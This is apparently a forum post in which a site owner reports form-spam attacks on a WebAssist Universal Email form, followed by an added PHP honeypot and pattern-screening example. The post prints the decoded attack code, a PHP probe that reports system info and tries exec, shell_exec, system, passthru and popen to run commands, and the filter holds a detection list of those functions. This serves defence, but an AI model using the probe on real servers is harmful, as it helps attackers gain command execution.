Security in UE - eval(base64_decode(( Hack
Got a number of emails from one of my UE (latest version) form submissions using the supplied template blank.php today. They were all subject to an attack where an eval(base64_decode string was sent via form email.
Decoded, the malicious code produces this result:
echo "v0pCr3w<br>";
echo "sys:".php_uname()."<br>";
$cmd="echo nob0dyCr3w";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
    $res = '';
    if (!empty($cfe)){
        if(function_exists('exec')){
            @exec($cfe,$res);
            $res = join("\n",$res);
        }
        elseif(function_exists('shell_exec')){
            $res = @shell_exec($cfe);
        }
        elseif(function_exists('system')){
            @ob_start();
            @system($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        }
        elseif(function_exists('passthru')){
            @ob_start();
            @passthru($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        }
        elseif(@is_resource($f = @popen($cfe,"r"))){
            $res = "";
            while(!@feof($f)) { $res .= @fread($f,1024); }
            @pclose($f);
        }
    }
    return $res;
}
This looks like an attempt to find entry, though I am starting the process of scanning my server for any unauthorized access/uploads.
Question: is Universal Email secure against such hack attempts?
I usually use a form text field that is positioned off screen via CSS and, IF populated, I do not process the form (basic Honeypot screening).
But IF there are other things that we should all be doing to protect our sites, and if there are any security concerns related to the WebAssist extensions, it would be helpful for this to be published.
Any comments from WebAssist staff?
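The honeypot check and a screen for the eval(base64_decode pattern described in the post, combined into one pre-processing step, as an added example that is not part of the original post and not WebAssist's code. The field names (`website`, `name`, `message`) and the function `screen_submission` are hypothetical, and the sample input is constructed.

```php
<?php
// Added example: screen a form submission before it is handed to the mailer.
// Assumption: 'website' is the off-screen honeypot field; all names are hypothetical.

const SUSPICIOUS = '/\b(eval|base64_decode|exec|shell_exec|system|passthru|popen|php_uname)\s*\(/i';

/** Returns the reasons to reject; an empty array means nothing was flagged. */
function screen_submission(array $post, string $honeypot = 'website'): array
{
    $reasons = [];

    // Honeypot: a human never sees this field, so any content means a bot filled it.
    if (isset($post[$honeypot]) && trim((string)$post[$honeypot]) !== '') {
        $reasons[] = "honeypot field '$honeypot' was filled in";
    }

    foreach ($post as $field => $value) {
        if (!is_string($value)) {   // an array sent where a string is expected
            $reasons[] = "field '$field' is not a string";
            continue;
        }
        // PHP code-execution calls appearing directly in the submitted text.
        if (preg_match(SUSPICIOUS, $value)) {
            $reasons[] = "field '$field' contains a PHP function call pattern";
        }
        // Long base64 runs: decode them and apply the same check to the plaintext.
        if (preg_match_all('/[A-Za-z0-9+\/]{40,}={0,2}/', $value, $m)) {
            foreach ($m[0] as $blob) {
                $decoded = base64_decode($blob, true);
                if ($decoded !== false && preg_match(SUSPICIOUS, $decoded)) {
                    $reasons[] = "field '$field' hides a PHP call inside base64";
                    break;
                }
            }
        }
    }
    return $reasons;
}

// Constructed sample shaped like the submission in the post (one line of the decoded text).
$sample = [
    'website' => '',
    'name'    => 'test',
    'message' => 'eval(base64_decode("' . base64_encode('echo "sys:".php_uname()."<br>";') . '"));',
];
foreach (screen_submission($sample) as $reason) {
    error_log("rejected form post: $reason");   // log and drop; do not send the email
}
```

The keyword pattern can flag ordinary prose such as "our system (the old one)", so log what it rejects and tune the list before relying on it. Screening reduces junk mail; a submitted string only executes if the server passes it to `eval()`, an include, or a writable .php file.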